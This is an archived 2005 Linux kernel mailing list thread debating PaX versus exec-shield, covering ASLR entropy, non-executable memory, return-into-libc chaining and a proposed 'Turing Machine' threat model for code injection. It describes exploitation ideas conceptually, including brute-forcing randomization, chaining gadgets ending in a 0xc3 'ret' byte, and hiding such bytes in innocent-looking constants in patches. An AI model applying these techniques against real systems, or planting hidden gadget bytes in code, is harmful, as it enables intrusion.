bugs, they enforce least privilege (to > whatever degree). [...] well, SELinux can be helpful in limiting dlopen() access - and if a context can do no valid dlopen() (due to SELinux restrictions) then the stacks dont need to be made executable either. > [...] the danger of relying on access control under Exec-Shield is > that once an attacker can execute his own code on the target system > (ESploit shows how), all it takes is a single exploitable kernel bug > and he's in for good. and as the past months have shown, such bugs are > not exactly unheard of in linux land. so ... in what way does PaX protect against all possible types of 'arbitrary code execution', via the exploit techniques i outlined in the previous mail? > > such an attack needs to get 2 or 3 random values right - which, > > considering 13-bits randomization per value is still 26-39 bits (minus > > the constant number of bits you can get away via replication). > > the maths doesn't quite work that way. what matters is not how many > random values you have to get right, but how much entropy you have to > get right. [...] the example in that case was libc,heap,stack, which are independent random variables and hence their entropy adds up. Once there's any coupling between two addresses, only the independent bits (if any) add up. > i'd also add that all this number juggling becomes worthless if > information can be leaked from the attacked task. yes, information leaks can defeat ASLR, and it obviously affects PaX just as much. > so the maths under Exec-Shield would be 12+16 bits or so, if i'm not > mistaken. [...] that's what i said too: 13+13 [to stay simple], or 13+13+13 if the heap is involved too. > the paper i linked to in my first post in this thread shows you a > technique that can find out the libc randomization without having to > learn the stack one. > > that technique is neither new nor the only one that can do this. to > your defense, i'd held this belief 3 years ago too (i.e., that > randomness of different areas would have to be guessed at once) but > for some time i'm much less sure that it's a useful generic > assumption. if you have a fork() based daemon (e.g. httpd) that will tolerate brute-force attacks then indeed you can 'probe' individual address components and reduce an N*M attack to N+M. and there are techniques against this: e.g. sshd already re-execs itself periodically. (i'm not sure about httpd, if it doesnt then it should too.) > > If the stack wasnt nonexec then the attack would need to get only > > 1 random value right. In that sense it still makes quite a difference > > in increasing the complexity of the attack, do you agree? > > based on the above explanation of what i know, i don't agree *in > general*, it has to be rather a special case when one really has to > guess different randomizations at once (again, unless proven > otherwise, i'll assume the worse case). well in the worst-case you have a big fat information leak that gives you all the address-space details. According to this logic it makes no sense to even think about ASLR, right? ;) > on another note, increasing the complexity of exploits this way is not > a good idea if you want the slightest security guarantees for your > system. the problem is that without a crash monitoring/reaction > mechanism one can just happily keep trying and eventually get in - > what is the point then? there are no guarantees whatsoever, if a C-style application gets overflown on the stack! (except some rare, very degenerate cases) > in the PaX strategy the reason for using randomization is that we > can't do much (yet) against the two other classes of exploit > techniques [...] they are not 'two other classes of exploit techniques'. Your categorization is a lowlevel one centered around machine code: (1) introduce/execute arbitrary code (2) execute existing code out of original program order (3) execute existing code in original program order with arbitrary data these are variations of one and the same thing: injecting code into a Turing machine. I'm not sure why you are handling the execution of arbitrary code (which in your case, wants to mean 'arbitrary machine code') in any way different from 'execute existing code out of original program order'. A chain of libc functions put on the stack _is_ new code for all practical purposes. And as you've mentioned it earier too, there are 'suitable' byte patterns in alot of common binaries, which you can slice & dice together to build something useful. trying to put some artificial barrier between 'arbitrary machine code' and 'arbitrary interpreted code' is just semantics, it doesnt change the fundamental fact that all of that is arbitrary program logic, caused by arbitrary bytes being passed in to the function stack. Attackers will pick whichever method is easier, not whichever method is 'more native'! > [...] plus it's a cheap measure, so 'why not'. [...] (btw., wasting 128 MB of the x86 stack on average is all but 'cheap') > [...] but it's not a security measure in the sense that controlling > runtime code generation is. in other words, the security guarantee > that PaX gives doesn't rely on randomization, [...] the data passed into a stack overflow is, by itself, without compiler help, 'arbitrary runtime code' in a form. You only have to find or construct the right interpreter for it. So to talk about any 'security guarantee' in such a scenario is pointless. > even with crash monitoring/reaction one can only claim a > 'probabilistic guarantee', something that's not always good enough i claim that 'arbitrary stack overflows', without compiler help, can only be protected against in a probabilistic way. > > As you can see on lkml, people are resisting changes hard that > > affect 2-3 apps. What chances do changes have that break dozens of > > common applications? > > i don't see your dilemma. having the ability to control runtime code > generation (making it a privilege, instead of a given) [...] so ... how do you define 'runtime code generation', and why do you exclude non-native execution methods, precisely? I still claim it cannot be deterministically controlled as a whole so it is of no significance to the security guarantees of the system whether the native portion is controlled deterministically or not. (because there are no guarantees for this one.) The rest of your mail centers around this contention that 'code generation' is equivalent to 'binary machine code injection' and can thus be controlled; so until this fundamental issue is cleared it makes little sense to answer the other 'when did you stop beating your wife' questions :-) Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-07 14:23 ` pageexec 2005-02-07 21:08 ` Ingo Molnar @ 2005-02-07 22:36 ` Ingo Molnar 2005-02-08 12:27 ` pageexec 1 sibling, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-07 22:36 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o btw., do you consider PaX as a 100% sure solution against 'code injection' attacks (meaning that the attacker wants to execute an arbitrary piece of code, and assuming the attacked application has a stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed way? Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-07 22:36 ` Ingo Molnar @ 2005-02-08 12:27 ` pageexec 2005-02-08 13:41 ` Ingo Molnar 2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar 0 siblings, 2 replies; 26+ messages in thread From: pageexec @ 2005-02-08 12:27 UTC (permalink / raw) To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o > btw., do you consider PaX as a 100% sure solution against 'code > injection' attacks (meaning that the attacker wants to execute an > arbitrary piece of code, and assuming the attacked application has a > stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed > way? your question is answered in http://pax.grsecurity.net/docs/pax.txt that i suggested you to read over a year ago. the short answer is that it's not only about stack overflows but any kind of memory corruption bugs, and you need both a properly configured kernel (for PaX/i386 that would be SEGMEXEC/MPROTECT/NOELFRELOCS) and an access control system (to take care of the file system and file mappings) and a properly prepared userland (e.g., no text relocations in ELF executables/libs, which is a good thing anyway). ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-08 12:27 ` pageexec @ 2005-02-08 13:41 ` Ingo Molnar 2005-02-08 14:25 ` Julien TINNES 2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar 1 sibling, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-08 13:41 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > btw., do you consider PaX as a 100% sure solution against 'code > > injection' attacks (meaning that the attacker wants to execute an > > arbitrary piece of code, and assuming the attacked application has a > > stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed > > way? > > your question is answered in http://pax.grsecurity.net/docs/pax.txt > that i suggested you to read over a year ago. the short answer is that > it's not only about stack overflows but any kind of memory corruption > bugs, and you need both a properly configured kernel (for PaX/i386 > that would be SEGMEXEC/MPROTECT/NOELFRELOCS) and an access control > system (to take care of the file system and file mappings) and a > properly prepared userland (e.g., no text relocations in ELF > executables/libs, which is a good thing anyway). i'm just curious, assuming that all those conditions are true, do you consider PaX a 100% sure solution against 'code injection' attacks? (assuming that the above PaX and access-control feature implementations are correct.) Do you think the upstream kernel could/should integrate it as a solution against code injection attacks? Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-08 13:41 ` Ingo Molnar @ 2005-02-08 14:25 ` Julien TINNES 2005-02-08 16:56 ` Ingo Molnar 0 siblings, 1 reply; 26+ messages in thread From: Julien TINNES @ 2005-02-08 14:25 UTC (permalink / raw) To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o > i'm just curious, assuming that all those conditions are true, do you > consider PaX a 100% sure solution against 'code injection' attacks? > (assuming that the above PaX and access-control feature implementations > are correct.) Do you think the upstream kernel could/should integrate it > as a solution against code injection attacks? > > Ingo It depends on what you call 'code injection'. - If code injection is the introduction of a new piece of directly executable-by-processor opcodes (I exclude interpreted code here) into a running process: 1. If you trust the Linux kernel, your processor, etc.. 2. If you have a non executable pages semantics implementation 3. If you have a restriction preventing PROT_EXEC|PROT_WRITE mappings from existing and any new PROT_EXEC mapping (meaning giving an existing mapping PROT_EXEC or creating a new PROT_EXEC mapping) from being created. then the answer is yes. PaX does 2 fully, and 3 partially: - It does'nt prevent executable file mapping (access control system must) - .text relocations are detected and permited if the option is enabled (necessary if you don't have PIC code) - there is an option that can be enable to emulate trampolines But if you consider code injection as in your previous post: >btw., do you consider PaX as a 100% sure solution against 'code >injection' attacks (meaning that the attacker wants to execute an >arbitrary piece of code, and assuming the attacked application has a >stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed >way? then the answer to your question is no because a stack overflow usually allows two things: injection of new code, and execution flow redirection. While the former is prevented, the later is not and the attacker could use chaining techniques as in [1] to execute "arbitrary code" (but not directly as an arbitrary, newly injected sequence of opcodes). Address space obfuscation (address space layout randomization is one way) is making it harder (but not impossible, esp. if you don't have anything preventing the attacker from bruteforcing...) to use existing code. [1]: Nergal, Advanced return into-lib(c) http://www.phrack.org/show.php?p=58&a=4 -- Julien TINNES - & france telecom - R&D Division/MAPS/NSS Research Engineer - Internet/Intranet Security GPG: C050 EF1A 2919 FD87 57C4 DEDD E778 A9F0 14B9 C7D6 ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-08 14:25 ` Julien TINNES @ 2005-02-08 16:56 ` Ingo Molnar 0 siblings, 0 replies; 26+ messages in thread From: Ingo Molnar @ 2005-02-08 16:56 UTC (permalink / raw) To: Julien TINNES; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * Julien TINNES <julien.tinnes.NOSPAM@francetelecom.REMOVE.com> wrote: > But if you consider code injection as in your previous post: > > >btw., do you consider PaX as a 100% sure solution against 'code > >injection' attacks (meaning that the attacker wants to execute an > >arbitrary piece of code, and assuming the attacked application has a > >stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed > >way? > > then the answer to your question is no because a stack overflow > usually allows two things: injection of new code, and execution flow > redirection. While the former is prevented, the later is not and the > attacker could use chaining techniques as in [1] to execute "arbitrary > code" (but not directly as an arbitrary, newly injected sequence of > opcodes). Address space obfuscation (address space layout > randomization is one way) is making it harder (but not impossible, > esp. if you don't have anything preventing the attacker from > bruteforcing...) to use existing code. precisely my point (see my previous, very long post). obviously it's not us who defines what 'code injection' is but the laws of physics and the laws of computer science. Restricting to the native CPU's machine code format may cover an important special-case, but it will prevent arbitrary code execution just as much as a house that has a locked door but an open window, where the owner defines "burglary" as "the bad guy tries to open the door". Correct in a sense, but not secure in guaranteed way :-| Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-08 12:27 ` pageexec 2005-02-08 13:41 ` Ingo Molnar @ 2005-02-08 16:48 ` Ingo Molnar 2005-02-08 22:08 ` Ingo Molnar 2005-02-08 22:41 ` H. Peter Anvin 1 sibling, 2 replies; 26+ messages in thread From: Ingo Molnar @ 2005-02-08 16:48 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > btw., do you consider PaX as a 100% sure solution against 'code > > injection' attacks (meaning that the attacker wants to execute an > > arbitrary piece of code, and assuming the attacked application has a > > stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed > > way? > > your question is answered in http://pax.grsecurity.net/docs/pax.txt the problem is - your answer in that document is i believe wrong, in subtle and less subtle ways as well. In particular, lets take a look at the more detailed PaX description in: http://pax.grsecurity.net/docs/pax-future.txt To understand the future direction of PaX, let's summarize what we achieve currently. The goal is to prevent/detect exploiting of software bugs that allow arbitrary read/write access to the attacked process. Exploiting such bugs gives the attacker three different levels of access into the life of the attacked process: (1) introduce/execute arbitrary code (2) execute existing code out of original program order (3) execute existing code in original program order with arbitrary data Non-executable pages (NOEXEC) and mmap/mprotect restrictions (MPROTECT) prevent (1) with one exception: if the attacker is able to create/write to a file on the target system then mmap() it into the attacked process then he will have effectively introduced and executed arbitrary code. [...] the blanket statement in this last paragraph is simply wrong, as it omits to mention a number of other ways in which "code" can be injected. ( there is no formal threat model ( == structured document defining types of attacks and conditions under which they occur) described on those webpages, but the above quote comes closest as a summary, wrt. the topic of code injection via overflows. ) firstly, let me outline what i believe the correct threat model is that covers all overflow-based code injection threats, in a very simplified sentence: ----------------------------------------------------------------- " the attacker wants to inject arbitrary code into a sufficiently capable (finite) Turing Machine on the attacked system, via overflows. " ----------------------------------------------------------------- as you can see from the formulation, this is a pretty generic model, that covers all conceivable forms of 'code injection' attacks - which makes it a natural choice to use. (A finite Turing Machine here is a "state machine with memory attached and code pre-defined". I.e. a simple CPU, memory and code.) a number of different types of Turing Machines may exist on any given target system: (1) Native Turing Machines (2) Intentional Turing Machines (3) Accidental Turing Machines (4) Malicious Turing Machines each type of machine can be attacked, and the end result is always the same: the attacker uses the capabilities of the attacked application for his own purposes. (==injects code) i'll first go through them one by one, in more detail. After that i'll talk about what i see as the consequences of this threat model and how it applies to the subject at hand, to PaX and to exec-shield. 1) Native Turing Machines ------------------------- this is the most commonly used and attacked (but by no means exclusive) type: machine code interpreted by a CPU. Note: 'CPU' does not necessarily mean the _host CPU_, it could easily mean code interpretation done by a graphics CPU or a firmware CPU. ( Note: 'machine code' does not necessarily mean that the typical operation mode of the host CPU is attacked: there are many CPUs that support multiple instruction set architectures. E.g. x86 CPUs support 16-bit and 32-bit code as well, and x64 supports 3 modes in fact: 64-bit, 32-bit and 16-bit code too. Depending on the type of application vulnerability, an attack may want to utilize a different type of ISA than the most common one, to minimize the complexity needed to utilize the Turing Machine. ) 2) Intentional Turing Machines ------------------------------ these are pretty commonly used too: "software CPUs" in essence, e.g. script interpreters, virtual machines and CPU emulators. There are also forms of code which one might not recognize as a Turing Machine: parsers of some of the more capable configuration files. in no case must these Turing Machines be handled in any way different from 'native binary code' - all that matters is the capabilities and attackability of the Turing Machine, not it's implementation! (E.g. an attack might go against a system that itself is running on an emulated CPU - in that case the attacker is up against an 'interpreter', not a real native CPU.) Note that such interpreters/machines, since implemented within a binary or library, can very often be used from within the process image via ret2libc methods, so they are not controllable via 'access control' means. ( Note that e.g. the sendmail.cf configuration language is a Turing-complete script language, with the interpreter code included in the sendmail binary. Someone once wrote a game of Hanoi in the sendmail.cf language ... ) 3) Accidental Turing Machines ----------------------------- the simplest form of Accidental Turing Machines seems purely theoretical: " what if the binary code of an application happens to include a byte sequence in its executable code section, that if jumped to implements a Turing Machine that the application writer did not intend to put there, that an attacker can pass arbitrary instructions to. " This, on the face of it, seems like a ridiculous possibility as the chances of that are reverse proportional to the number of bits necessary to implement the simplest Turing Machine. (which for anything even closely usable are on the order of 2^10000, less likely than the likelyhood of us all living to the end of the Universe.) but that chance calculation assumes that the Turing Machine is implemented as one block of native code. What happens if the Turing Machine is 'pieced together', from very small 'building blocks of code'? this may still seem unlikely, but depending on the instruction format of the native machine code, it can become possible. In particular: on CISC CPUs with variable length instructions, the number of 'possible instructions' is larger (and much more varied) than the number, type and combination of actual instructions in the libraries/binaries, and the type of instructions is very rich as well - giving more chance to the attacker to find the right 'building blocks' for a "sufficiently capable Turing Machine". The most extreme modern example of CISC is x86, where 99% of all byte values can be the beginning of a valid instruction and more than 95% of every byte position within binary code is interpretable by the CPU without faulting. (This means that e.g. in an 1.5 MB Linux kernel image, there are over 800 thousand instructions - but the number of possible instruction addresses is nearly 1.5 million.) Furthermore, on x86, a key instruction, 'ret' is encoded via a single byte (0xc3). This means that if a stack overflow allow arbitrary jump to an arbitrary code address, all you have to do to 'build' a Turing Machine is to find the right type of instruction followed by a single-byte 'ret' instruction. A handful of operations will do to construct one. I'm not aware of anyone having done such a machine as proof-of-concept, but fudnamentally the 'chain of functions called' techniques used in ret2libc exploits (also used in your example) are amongst the basic building blocks of a 'Stack Based Turing Machine'. Note that time works in favor of Accidental Turing Machines: the size of application code and library code grows, so the chance to find the basic building blocks increases as well. also note that it's impossible to prove for a typical application that _no_ Accidental Turing Machine can be built out of a stack overflow on x86. So no protection measure can claim to _100%_ protect against Accidental Turing Machines, without analysing each and every application and making it sure that _no_ Turing Machine could ever be built out of it! lets go back to the PaX categorization briefly, and check it out how they relate to Accidental Turing Machines: (1) introduce/execute arbitrary code (2) execute existing code out of original program order (3) execute existing code in original program order with arbitrary data #2 (or #3) can be used as the basic building for an Accidental Turing Machine, and can be thus be turned back into #1. So #1 overlaps with #2, #3 and thus makes little sense in isolation - only if you restrict the categories to cover 'native, binary machine code' - but such a restriction would make little sense as the format and encoding of code doesnt matter, it's the 'arbitrary programming' that must be prevented! in fact, #2, #3 are just limited aspects of "Accidental Turing Machines": trying to use existing code sequences in a way to form the functionality the attacker wants. 4) Malicious Turing Machines ---------------------------- given the complexity of the x86 instruction format, a malicious attacker could conceivably inject Turing Machine building blocks into seemingly unrelated functions as well, hidden in innocious-looking patches. E.g. this innocous looking code: #define MAGIC 0xdeadc300 assert(data->field == MAGIC); injects a hidden 'ret' into the code - while the application uses that byte as a constant! Chosing the right kind of code you can inject arbitrary building blocks without them ever having any functionality in the original (intended) instruction stream! Since most x86-ish CPUs do not enforce 'intended instruction boundaries', attacks like this are possible. Threat Analysis --------------- the current techniques of PaX protect against the injection of code into Native Turing Machines of the Host CPU, but PaX does not prevent code injection into the other types of Turing Machines. A number of common examples for Intentional Turing Machines in commonly attacked applications: the Apache modules PHP, perl, fastcgi, python, etc, or sendmail's sendmail.cf interpreter. Another, less known examples of Turing Machines are interpreters within the kernel: e.g. the ACPI interpreter. (In fact there have been a number of patches/ideas that introduce Universal Turing Machines into the kernel, so the trend is that the kernel will get _multiple_ Turing Machines.) Furthermore, if there's _any_ DSO on the system that has any implementation of a Turing Machine (either a sufficiently capable interpreter, or any virtual machine), that is dlopen()-able by the attacked application, then that may be used for the attack too. (Yes, you could avoid this via access control means, but that really flouts the problem at hand.) Plus, even if all intentional Turing Machines are removed from the system (try that in practice!), and an application can dlopen() random, unrelated DSO's, it can thus still increase the chances of finding the building blocks for an Accidental (or Malicious) Turing Machine by dlopen()-ing them. PaX does nothing (simply because it cannot) against most types of Intentional, Accidental or Malicious Turing Machines. (interesting detail: PaX doesnt fully cover all types of Native Turing Machines.) a more benign detail: while the above techniques are all concentrated on 'process-internal' execution strategies, i consider this exclusion of process-external execution as an arbitrary restriction of the PaX threat model as well. 'excluding' external interpreters from the threat model is impractically restrictive. It may be a less dangerous attack for some threats (because it most likely wont run under the same high privileges as the attacked app), but it's still a dangerous category that should be considered in companion to "process internal" attacks. Conclusion ---------- arbitrary-write attacks against the native function stack, on x86, cannot be protected against in a sure way, after the fact. Neither PaX, nor exec-shield can do it - and in that sense PaX's "we solved this problem" stance is more dangerous because it creates a false sense of security. With exec-shield you at least know that there are limitations and tradeoffs. some of the overflows can be protected against 'before the fact' - in gcc and glibc in particular. You've too mentioned FORTIFY_SOURCE before (an upcoming feature of Fedora Core 4), and much more can be done. Also, type-safe languages are much more robust against such types of bugs. So i consider PaX and exec-shield conceptually equivalent in the grand scheme of code injection attacks: none of them 'solves' the (unsolvable) problem in a 100% way, none of them 'guarantees' anything about security (other than irrelevant special cases), but both try to implement defenses, with a different achieved threshold of 'required minimum complexity of an attack to succeed'. To repeat: 100% protection against code injection cannot be achieved. The intentional tradeoffs exec-shield has have been discussed in great detail, and while i give you the benefit of doubt (and myself the possibility of flawed thinking), it might now as well be the right time for you to double-check your own thinking wrt. PaX? And you should at minimum accurately document that PaX is only trying to deal with injection of native binary code, and that there are a number of other ways to inject external code into an application. Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar @ 2005-02-08 22:08 ` Ingo Molnar 2005-02-10 13:43 ` Ingo Molnar 2005-02-08 22:41 ` H. Peter Anvin 1 sibling, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-08 22:08 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * Ingo Molnar <mingo@elte.hu> wrote: > http://pax.grsecurity.net/docs/pax-future.txt > > To understand the future direction of PaX, let's summarize what we > achieve currently. The goal is to prevent/detect exploiting of > software bugs that allow arbitrary read/write access to the attacked > process. Exploiting such bugs gives the attacker three different > levels of access into the life of the attacked process: > > (1) introduce/execute arbitrary code > (2) execute existing code out of original program order > (3) execute existing code in original program order with arbitrary > data > > Non-executable pages (NOEXEC) and mmap/mprotect restrictions > (MPROTECT) prevent (1) with one exception: if the attacker is able to > create/write to a file on the target system then mmap() it into the > attacked process then he will have effectively introduced and > executed arbitrary code. > [...] > > the blanket statement in this last paragraph is simply wrong, as it > omits to mention a number of other ways in which "code" can be > injected. i'd like to correct this sentence of mine because it's unfair: your categories are consistent if you define 'code' as 'machine code', and it's clear from your documents that you mean 'machine code' under code. (My other criticism remains.) Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-08 22:08 ` Ingo Molnar @ 2005-02-10 13:43 ` Ingo Molnar 2005-02-10 13:58 ` Jakob Oestergaard 0 siblings, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-10 13:43 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > the bigger problem is however that you're once again fixing the > symptoms, instead of the underlying problem - not the correct > approach/mindset. i'll change my approach/mindset when it is proven that "the underlying problem" can be solved. (in a deterministic fashion) in case you dont accept the threat model i outlined (the [almost-Universal] Turing Machine approach), here are the same fundamental arguments, applied to the PaX threat model. first about the basic threat itself: it comes from some sort of memory overwrite condition that an attacker can control - we assume the worst-case, that the attacker has arbitrary read/write access to the writable portions of the attacked task's address space. [this threat arises out of some sort of memory overwrite flaw most of the time.] you are splitting the possible effects of a given specific threat into 3 categories: (1) introduce/execute arbitrary [native] code (2) execute existing code out of original program order (3) execute existing code in original program order with arbitrary data then you are building defenses against each category. You say that PaX covers (1) deterministically, while exec-shield only adds probabilistic defenses (which i agree with). You furthermore say (in your docs) that PaX (currently) offers probabilistic defenses against (2) and (3). You furthermore document it that (2) and (3) can likely only be probabilistically defended against. i hope we are in agreement so far, and here comes the point where i believe our opinion diverges: i say that if _any_ aspect of a given specific threat is handled in a probabilistic way, the whole defense mechanism is still only probabilistic! in other words: unless you have a clear plan to turn PaX into a deterministic defense, for a specific threat outlined above, it is just as probabilistic (clearly with a better entropy) as exec-shield. PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield is in the 6th month, but that does not change the fundamental end-result: a child will be born ;-) you cannot just isolate a given attack type ('exploit class') and call PaX deterministic and trumpet a security guarantee - since what makes sense from a security guarantee point of view is the actions of the *attacker*: _can_ the attacker mount a successful attack or not, given a specific threat? If he can never mount a successful attack (using a specific flaw) then the defense is deterministic. If there is an exploit class that can be successful then the defense is probabilistic. (or nonexistent) Defending only against a class of exploits (applied to the specific threat) will force attackers towards the remaining areas - but if those remaining areas cannot be defended against for sure, then you cannot say that PaX offers a security guarantee against that specific threat. Talking about security guarantees against 'sub-threats' does not make sense because attackers dont do us the favor of using only one class of attacks. and once we are in the land of probabilistic defenses, it's the weakest link that matters. It might make sense to handle the 'native code injection' portion of the threat in a deterministic way, but only as a tool to drive attackers towards vectors that are less probable, and it is not in any way giving any security guarantee. Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 13:43 ` Ingo Molnar @ 2005-02-10 13:58 ` Jakob Oestergaard 2005-02-10 15:21 ` Ingo Molnar 0 siblings, 1 reply; 26+ messages in thread From: Jakob Oestergaard @ 2005-02-10 13:58 UTC (permalink / raw) To: Ingo Molnar; +Cc: pageexec, linux-kernel, Arjan van de Ven, Theodore Ts'o On Thu, Feb 10, 2005 at 02:43:14PM +0100, Ingo Molnar wrote: > > * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > > the bigger problem is however that you're once again fixing the > > symptoms, instead of the underlying problem - not the correct > > approach/mindset. > > i'll change my approach/mindset when it is proven that "the underlying > problem" can be solved. (in a deterministic fashion) I know neither exec-shield nor PaX and therefore have no bias or preference - I thought I should chirp in on your comment here Ingo... ... > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > is in the 6th month, but that does not change the fundamental > end-result: a child will be born ;-) Yes and no. I would think that the chances of a child being born are greater if the pregnancy has lasted successfully up until the 6th month, compared to a first week pregnancy. I assume you get my point :) -- / jakob ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 13:58 ` Jakob Oestergaard @ 2005-02-10 15:21 ` Ingo Molnar 2005-02-10 20:03 ` David Weinehall 0 siblings, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-10 15:21 UTC (permalink / raw) To: Jakob Oestergaard, pageexec, linux-kernel, Arjan van de Ven, Theodore Ts'o * Jakob Oestergaard <jakob@unthought.net> wrote: > On Thu, Feb 10, 2005 at 02:43:14PM +0100, Ingo Molnar wrote: > > > > * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > > > > the bigger problem is however that you're once again fixing the > > > symptoms, instead of the underlying problem - not the correct > > > approach/mindset. > > > > i'll change my approach/mindset when it is proven that "the underlying > > problem" can be solved. (in a deterministic fashion) > > I know neither exec-shield nor PaX and therefore have no bias or > preference - I thought I should chirp in on your comment here Ingo... > > ... > > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > > is in the 6th month, but that does not change the fundamental > > end-result: a child will be born ;-) > > Yes and no. I would think that the chances of a child being born are > greater if the pregnancy has lasted successfully up until the 6th month, > compared to a first week pregnancy. > > I assume you get my point :) the important point is: neither PaX nor exec-shield can claim _for sure_ that no child will be born, and neither can claim virginity ;-) [ but i guess there's a point where a bad analogy must stop ;) ] Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 15:21 ` Ingo Molnar @ 2005-02-10 20:03 ` David Weinehall 2005-02-11 8:51 ` Mika Bostrom 0 siblings, 1 reply; 26+ messages in thread From: David Weinehall @ 2005-02-10 20:03 UTC (permalink / raw) To: Ingo Molnar Cc: Jakob Oestergaard, pageexec, linux-kernel, Arjan van de Ven, Theodore Ts'o On Thu, Feb 10, 2005 at 04:21:49PM +0100, Ingo Molnar wrote: > > * Jakob Oestergaard <jakob@unthought.net> wrote: > > > On Thu, Feb 10, 2005 at 02:43:14PM +0100, Ingo Molnar wrote: > > > > > > * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > > > > > > the bigger problem is however that you're once again fixing the > > > > symptoms, instead of the underlying problem - not the correct > > > > approach/mindset. > > > > > > i'll change my approach/mindset when it is proven that "the underlying > > > problem" can be solved. (in a deterministic fashion) > > > > I know neither exec-shield nor PaX and therefore have no bias or > > preference - I thought I should chirp in on your comment here Ingo... > > > > ... > > > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > > > is in the 6th month, but that does not change the fundamental > > > end-result: a child will be born ;-) > > > > Yes and no. I would think that the chances of a child being born are > > greater if the pregnancy has lasted successfully up until the 6th month, > > compared to a first week pregnancy. > > > > I assume you get my point :) > > the important point is: neither PaX nor exec-shield can claim _for sure_ > that no child will be born, and neither can claim virginity ;-) > > [ but i guess there's a point where a bad analogy must stop ;) ] Yeah, sex is *usually* a much more pleasant experience than having your machine broken into, even if it results in a pregnancy. =) Regards: David -- /) David Weinehall <tao@acc.umu.se> /) Northern lights wander (\ // Maintainer of the v2.0 kernel // Dance across the winter sky // \) http://www.acc.umu.se/~tao/ (/ Full colour fire (/ ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 20:03 ` David Weinehall @ 2005-02-11 8:51 ` Mika Bostrom 0 siblings, 0 replies; 26+ messages in thread From: Mika Bostrom @ 2005-02-11 8:51 UTC (permalink / raw) To: linux-kernel [-- Attachment #1: Type: text/plain, Size: 1442 bytes --] [Posted only on LKML, this has become humour.] On Thu, Feb 10, 2005 at 09:03:00PM +0100, David Weinehall wrote: > On Thu, Feb 10, 2005 at 04:21:49PM +0100, Ingo Molnar wrote: > > > > * Jakob Oestergaard <jakob@unthought.net> wrote: > > > > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > > > > is in the 6th month, but that does not change the fundamental > > > > end-result: a child will be born ;-) > > > > > > Yes and no. I would think that the chances of a child being born are > > > greater if the pregnancy has lasted successfully up until the 6th month, > > > compared to a first week pregnancy. > > > > > > I assume you get my point :) > > > > the important point is: neither PaX nor exec-shield can claim _for sure_ > > that no child will be born, and neither can claim virginity ;-) > > > > [ but i guess there's a point where a bad analogy must stop ;) ] > > Yeah, sex is *usually* a much more pleasant experience than having your > machine broken into, even if it results in a pregnancy. =) I'll bite, before anyone else says it... It can not be a mere coincidence that the most rigorous security audits include penetration testing. -- Mika Boström +358-40-525-7347 \-/ "World peace will be achieved Bostik@iki.fi www.iki.fi/bostik X when the last man has killed Security freak, and proud of it. /-\ the second-to-last." -anon? [-- Attachment #2: Digital signature --] [-- Type: application/pgp-signature, Size: 189 bytes --] ^ permalink raw reply [flat|nested] 26+ messages in thread
